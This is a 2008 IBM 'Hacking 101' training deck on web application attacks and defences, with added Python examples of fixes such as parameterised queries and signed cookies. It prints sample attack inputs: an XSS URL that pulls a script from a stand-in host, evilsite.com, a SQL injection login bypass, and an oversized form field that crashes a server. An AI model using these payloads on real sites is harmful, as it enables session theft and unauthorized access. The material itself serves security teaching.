
IBM Software Group

Hacking 101
January 22, 2008

An IBM Proof of Technology

© 2007 IBM Corporation


Security Landscape


TechWorks

Objective
● Understand the web application environment
● Understand and differentiate between network and application level vulnerabilities
● Understand where the vulnerabilities exist


High Level Web Application Architecture

● Desktop: Antivirus Protection
● Transport: Encryption (SSL)
● Network: Firewalls / Advanced Routers
● Web Applications: Web Servers, Application Server, Backend Firewall, Databases


Network Defenses for Web Applications

● Perimeter Firewall
● IDS (Intrusion Detection System)
● IPS (Intrusion Prevention System)
● App Firewall (Application Firewall)
● System Incident Event Management (SIEM)


The Myth: “Our Site Is Safe”

● We Have Firewalls in Place
● We Audit It Once a Quarter with Pen Testers
● We Use Network Vulnerability Scanners


The Reality: Security and Spending Are Unbalanced

Security Spending

                    % of Attacks    % of Dollars
Web Applications    75%             10%
Network Server      25%             90%

75% of all attacks on Information Security are directed to the Web Application Layer.

2/3 of All Web Applications Are Vulnerable

Sources: Gartner, Watchfire


WASC – Threat Classifications

Application Threat: Authentication
Attack Types:
● Brute Force
● Insufficient Authentication
● Weak Password Recovery Validation
Example Business Impact: Attacks that target a web site’s method of validating the identity of a user, service or application.

Application Threat: Authorization
Attack Types:
● Credential/Session Prediction
● Insufficient Authorization
● Insufficient Session Expiration
● Session Fixation
Example Business Impact: Attacks that target a web site’s method of determining if a user, service or application has the necessary permissions to perform a requested action.

Application Threat: Client-side Attacks
Attack Types:
● Content Spoofing
● Cross Site Scripting
Example Business Impact: The abuse or exploitation of a web site’s users (breaching trust relationships between a user and a web site).

Application Threat: Command Execution
Attack Types:
● Buffer Overflow
● Format String Attack
● LDAP Injection
● OS Commanding
● SQL Injection
● SSI Injection
● XPath Injection
Example Business Impact: Attacks designed to execute remote commands on the web site by manipulating user-supplied input fields.
Application Threat: Information Disclosure
Attack Types:
● Directory Indexing
● Information Leakage
● Path Traversal
● Predictable Resource Location
Example Business Impact: Attacks designed to acquire system specific information about a web site. This includes software distribution, version numbers, patch levels, and also secure file locations.

Application Threat: Logical Attacks
Attack Types:
● Abuse of Functionality
● Denial of Service
● Insufficient Anti-automation
● Insufficient Process Validation
Example Business Impact: The abuse or exploitation of a web application logic flow (password recovery, account registration, auction bidding and eCommerce purchasing are examples of application logic).

Let’s See Some Examples …

Parameter Tampering
● What is it?
  - Parameters are used to obtain information from the client.
  - This information can be changed in a site’s URL parameter.
● Why does parameter tampering exist?
  - Developers focus on the legal values of parameters and how they should be utilized.
  - Little if any attention is given to the incorrect values.
● Business Impact
  - The application can perform a function that was not intended by its developer, like giving access to customer information.


Parameter Tampering


Why not wildcard the parameter?


Brute Force
● What is it?
  - Automated process of trial and error methods used to guess a person’s username, password, credit-card number or cryptographic keys. Also called Parameter Tampering.
● Why do Brute Force attacks exist?
  - Weak passwords and encryption techniques
    - Easy to guess, dictionary based
  - No account lockout
    - Site doesn’t lock out a user after 3 invalid login attempts
● Business Impact
  - It may be possible to escalate user privileges and gain administrative permissions over the web application
  - Confidential information disclosure
  - Financial risk
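The slide names the missing control: no lockout after 3 invalid attempts. As an added example (not code from the deck or from AppScan), the Python below shows a login check that counts consecutive failures per account, locks the account for a window after the third one, and hashes against a dummy record for unknown usernames so response time does not reveal which usernames exist. The account, the 15-minute window and the PBKDF2 iteration count are assumptions for the demo.

```python
import hashlib
import hmac
import secrets
import time

MAX_FAILURES = 3            # the threshold the slide mentions ("after 3 invalid login attempts")
LOCKOUT_SECONDS = 15 * 60   # assumed lockout window; tune to the site's risk appetite

def hash_password(password: str, salt: bytes) -> bytes:
    # Slow, salted hash so a leaked credential store is expensive to crack offline
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

class LoginGuard:
    """Verifies credentials and locks an account after MAX_FAILURES consecutive failures."""

    def __init__(self, credentials, clock=time.monotonic):
        # credentials: username -> (salt, pbkdf2 digest); clock is injectable for testing
        self._creds = credentials
        self._clock = clock
        self._failures = {}      # username -> consecutive failed attempts
        self._locked_until = {}  # username -> clock value at which the lock expires
        dummy_salt = b"\x00" * 16
        self._dummy = (dummy_salt, hash_password("placeholder", dummy_salt))

    def is_locked(self, user: str) -> bool:
        return self._clock() < self._locked_until.get(user, 0.0)

    def attempt(self, user: str, password: str) -> str:
        """Returns "ok", "denied" or "locked"."""
        if self.is_locked(user):
            return "locked"      # the password is not evaluated at all while locked
        # Unknown users are hashed against a dummy record so timing does not leak
        # whether the username exists (username enumeration feeds brute-force attacks)
        salt, expected = self._creds.get(user, self._dummy)
        matched = hmac.compare_digest(expected, hash_password(password, salt))
        if matched and user in self._creds:
            self._failures.pop(user, None)
            return "ok"
        count = self._failures.get(user, 0) + 1
        if count >= MAX_FAILURES:
            self._failures.pop(user, None)
            self._locked_until[user] = self._clock() + LOCKOUT_SECONDS
            return "locked"
        self._failures[user] = count
        return "denied"

def build_demo_guard(clock=time.monotonic) -> LoginGuard:
    # Constructed sample account using the credentials shown later in the deck
    salt = secrets.token_bytes(16)
    return LoginGuard({"jsmith": (salt, hash_password("demo1234", salt))}, clock=clock)
```

Per-account lockout can itself be abused to lock legitimate users out, so in practice it is combined with per-source rate limiting or a CAPTCHA step rather than used alone.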


Brute Force – Automated ‘Guessing’ Game


Brute Force Tools are Easy to Find …


The Same is True with Dictionary Lists …


Brute Force – Automated ‘Guessing’ Game


● Data Mining at MySpace.com: published on the [Full Disclosure] mailing list on June 30th 2006
● MySpace.com, an online social networking web site
  - Offers its members the ability to send news bulletins to other MySpace members
● When you submit your bulletin a URL is sent to your friends that looks similar to this:
  http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.read&messageID=[BID]
  [BID] is an automatically generated numeric bulletin ID
● By changing the bulletin ID number, users were able to access the news bulletins of other MySpace members which they had not received notification about, and read the contents
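The MySpace bulletin case is the parameter tampering pattern from the previous slide: the URL parameter selects the record, and nothing checks who is asking. As an added example (not code from the deck or from MySpace), the Python below shows a lookup that serves any valid messageID beside one that validates the parameter and checks the caller against the bulletin's author and recipients. Bulletins, users and the NotFound response are constructed for the demo.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Bulletin:
    bulletin_id: int
    author: str
    recipients: frozenset
    body: str

# Constructed sample data (not real bulletins); IDs are sequential like the [BID] on the slide
BULLETINS = {
    1001: Bulletin(1001, "alice", frozenset({"bob", "carol"}), "Band practice moved to Friday"),
    1002: Bulletin(1002, "dave", frozenset({"erin"}), "Private: here is my new phone number"),
}

class NotFound(Exception):
    """Raised for missing AND not-authorized IDs, so the response does not tell them apart."""

def parse_bulletin_id(raw: str) -> int:
    # Only a plain positive integer is a legal value; anything else is rejected, not "handled"
    if not (raw.isascii() and raw.isdigit()):
        raise NotFound(raw)
    return int(raw)

def read_bulletin_unchecked(raw_id: str) -> str:
    """Mirrors the flaw: any existing messageID is served, whoever asks for it."""
    bulletin = BULLETINS.get(parse_bulletin_id(raw_id))
    if bulletin is None:
        raise NotFound(raw_id)
    return bulletin.body

def read_bulletin(current_user: str, raw_id: str) -> str:
    """Fixed version: the ID selects the record, the logged-in user decides if it is shown."""
    bulletin = BULLETINS.get(parse_bulletin_id(raw_id))
    allowed = bulletin is not None and (
        current_user == bulletin.author or current_user in bulletin.recipients)
    if not allowed:
        raise NotFound(raw_id)
    return bulletin.body

def can_read(current_user: str, raw_id: str) -> bool:
    """Convenience wrapper: True when read_bulletin would return the body."""
    try:
        read_bulletin(current_user, raw_id)
        return True
    except NotFound:
        return False
```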


Directory Indexing
● What is it?
  - It is possible to view and download the contents of certain web application virtual directories, which may contain restricted files.
● Why do Insufficient Authentication attacks exist?
  - Web-based administration tools
    - ‘Hidden’, not linked to main site (easier to set up, but a danger if the admin site is URL accessible)
  - ‘/admin’ directory off of the root
● Business Impact
  - Attacker can view confidential files
  - Attacker can construct a targeted attack plan for your site
  - Directory navigation to restricted areas of the site


The application’s default page


Navigation to Sensitive Files


Credential/Session Prediction
● What is it?
  - A method of hijacking or impersonating a web site user
  - Also called Cookie Poisoning
● Why do Credential/Session Prediction attacks exist?
  - Session IDs stored as cookies, hidden fields or URL values
  - An attacker will try to determine the algorithm used to generate the ID and try to impersonate the current user or the next session ID
● Business Impact
  - User impersonation
  - Fraudulent access and use of a user’s (or many users’) information/account/confidential details


Cookie Poisoning – When cookies are bad


Why not try to modify the cookie values?


Change cookie value? Change user .. Not good!!
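The three cookie slides show a server that trusts a user name stored in the cookie, and the Credential/Session Prediction slide describes guessable IDs. As an added example (not code from the deck), the Python below contrasts that weak cookie with one whose session ID comes from the OS random generator, whose value is HMAC-signed so edits are detected, and whose lifetime is enforced server-side (the "Insufficient Session Expiration" item from the WASC table). The server key, the 30-minute timeout and the cookie layout are assumptions.

```python
import hashlib
import hmac
import secrets
import time

SESSION_TTL = 30 * 60                 # assumed idle timeout in seconds
SERVER_KEY = secrets.token_bytes(32)  # assumption: in production this is protected config, not per-process
SESSIONS = {}                         # session id -> (username, expiry); server-side store

def _sign(payload: str) -> str:
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()

def weak_user_from_cookie(cookie: str):
    """Mirrors the slide: the server believes whatever 'user=' value the browser sends back."""
    pairs = dict(item.split("=", 1) for item in cookie.split("; ") if "=" in item)
    return pairs.get("user")

def issue_cookie(username: str, now: float = None) -> str:
    now = time.time() if now is None else now
    sid = secrets.token_urlsafe(32)   # 256 random bits: not derivable from earlier IDs or the clock
    SESSIONS[sid] = (username, now + SESSION_TTL)
    payload = f"{username}|{sid}"
    return f"{payload}|{_sign(payload)}"   # username stays readable but is no longer editable

def user_from_cookie(cookie: str, now: float = None):
    """Returns the user for a valid, untampered, unexpired cookie; None otherwise."""
    now = time.time() if now is None else now
    parts = cookie.split("|")
    if len(parts) != 3:
        return None
    username, sid, mac = parts
    if not hmac.compare_digest(mac, _sign(f"{username}|{sid}")):
        return None                   # tampered or forged: signature does not match
    record = SESSIONS.get(sid)
    if record is None or record[0] != username:
        return None                   # unknown session, or username swapped for another session
    if now > record[1]:
        SESSIONS.pop(sid, None)       # expired: the server, not the browser, ends the session
        return None
    return username
```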


Application Buffer Overflow
● What is it?
  - The amount of unvalidated data sent in the request is more than the application was designed to handle.
● Why do application buffer overflows exist?
  - Time
  - Application components expect other components to provide data validation checks.
  - The user is allowed to modify the data controls.
● Business Impact
  - It is possible to execute remote commands on the web server. This usually means complete compromise of the server and its contents.
  - It is possible to prevent the web application from serving other users (denial of service).


Buffer Overflows – Still around after all these years


Application asks the browser to enforce data validation

<INPUT size="25" name="subject" value="" />


Users can bypass browser controls

<INPUT size="10000" name="subject" value="" />


In this case causing a server crash


Cross Site Scripting
● What is it?
  - The user provides unvalidated data in a request that is echoed to the user as part of the response.
  - The unvalidated data contains a script that is executed in the context of the user’s browser session.
● Why does Cross Site Scripting happen?
  - User input is used to build/customize/personalize the response. The application does not anticipate the data will be executed in the user’s browser context.
● Business Impact
  - “Virtual hijacking” of the session.
  - Any information flowing between the legitimate user and site can be manipulated or transmitted to a 3rd party.
● We will cover this in more detail during the Hands-On portion, but check this out …


Attacking users via Cross Site Scripting (XSS)


User sends the site more than they think

http://www.altoromutual.com/altoro/search.aspx?txtSearch=%3Cscript+src%3D%22http%3A%2F%2Fwww.evilsite.com%2Fxss%2Fhijack.js%22%3E%3C%2Fscript%3E
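Two slides make the same point from different sides: the browser-enforced size="25" is bypassed by editing the form, and the search page echoes txtSearch back unencoded. As an added example (not code from the deck or from the Altoro Mutual demo site), the Python below decodes the request URL above the way a server would, shows the verbatim echo beside an HTML-encoded one, and enforces the length limit server-side where it actually counts. The handler and its limit are assumptions for the demo.

```python
import html
from urllib.parse import parse_qs, urlsplit

MAX_SEARCH_LEN = 25   # the limit the form's size="25" only suggests, now enforced server-side

# The request URL from the slide, reassembled onto one line
SLIDE_URL = ("http://www.altoromutual.com/altoro/search.aspx?txtSearch=%3Cscript+src%3D%22"
             "http%3A%2F%2Fwww.evilsite.com%2Fxss%2Fhijack.js%22%3E%3C%2Fscript%3E")

def query_param(url: str, name: str) -> str:
    """Decodes %xx escapes and '+' exactly as the server's request parser would."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])
    return values[0]

def render_vulnerable(term: str) -> str:
    """Echoes the input verbatim: any markup the user sent becomes part of the page."""
    return f"<p>No results for: {term}</p>"

def render_safe(term: str) -> str:
    """HTML-encodes the echoed value so the browser displays it as text instead of running it."""
    return f"<p>No results for: {html.escape(term, quote=True)}</p>"

def handle_search(url: str):
    """Returns (status, body). Oversized input is rejected, not truncated, before rendering."""
    term = query_param(url, "txtSearch")
    if len(term) > MAX_SEARCH_LEN:
        return 400, "search term too long"
    return 200, render_safe(term)
```

html.escape is the right encoding only for text placed in the HTML body; a value inserted into an attribute, a URL or a script block needs the encoding for that context.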


Cross Site Scripting – The Process

Actors: Bad Guy, User, bank.com

1) Link to bank.com sent to user via E-mail or HTTP
2) User sends script embedded as data
3) Script/data returned, executed by browser
4) Script sends user’s cookie and session information without the user’s consent or knowledge
5) Bad guy uses stolen session information to impersonate user


SQL Injection
● What is it?
  - An attacker injects malicious characters (SQL syntax) into web application parameters in an attempt to change the original syntax of the query.
● Why does SQL Injection exist?
  - Sanitization of hazardous characters was not performed correctly on user input.
● Business Impact
  - It is possible to view, modify or delete database entries and tables.
  - It is possible to alter the original query in order to bypass normal authentication mechanisms.


SQL Injection

Username: jsmith
Password: demo1234


Normal login for JSMITH


The start of a SQL injection attack

Username: '
Password: a
(Need password to bypass client-side validation.)


Step 1 – We have an error


Step 2 – Try a more complete SQL statement

Username: hi' or 1=1 --
Password: a
(Need password to bypass client-side validation.)


Now we are Admin, without a username and password!
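Steps 1 and 2 above show the symptom (a database error) and the result (an admin session). As an added example (not code from the deck or from the Altoro Mutual demo site), the Python below rebuilds that login against an in-memory SQLite table: the concatenated query errors on a lone quote and returns the first row, the admin, for the "hi' or 1=1 --" input, while the parameterised version binds the same input as data and returns nothing. The table, the admin row and the clear-text passwords are constructed to mirror the slide; a real store keeps salted hashes.

```python
import sqlite3

def build_demo_db() -> sqlite3.Connection:
    """Constructed sample users table; the admin row comes first, as on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "admin-password-placeholder", "admin"), ("jsmith", "demo1234", "user")])
    return conn

def login_vulnerable(conn, username: str, password: str):
    """String concatenation: the user's quote characters become SQL syntax.

    With username "hi' or 1=1 --" the statement becomes
      ... WHERE username = 'hi' or 1=1 --' AND password = 'a'
    so the password check is commented out and every row matches.
    A lone "'" instead leaves an unterminated string and the database raises an error
    (the "Step 1" slide).
    """
    sql = ("SELECT username, role FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()

def login_safe(conn, username: str, password: str):
    """Parameterised query: the values are bound as data and cannot alter the statement."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()
```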


Automated Tools

Automated Scanning Tools


AppScan


Q&A

Questions?


Resources
● Download AppScan 7.6: http://www.watchfire.com
● For the latest whitepapers visit: http://www.watchfire.com/news/whitepapers.aspx
● Visit Watchfire at one of our upcoming shows: http://www.watchfire.com/news/events.aspx
● Register for upcoming web seminars: http://www.watchfire.com/news/seminars.aspx
● Contact us at sales@watchfire.com

Thank-you for joining us today!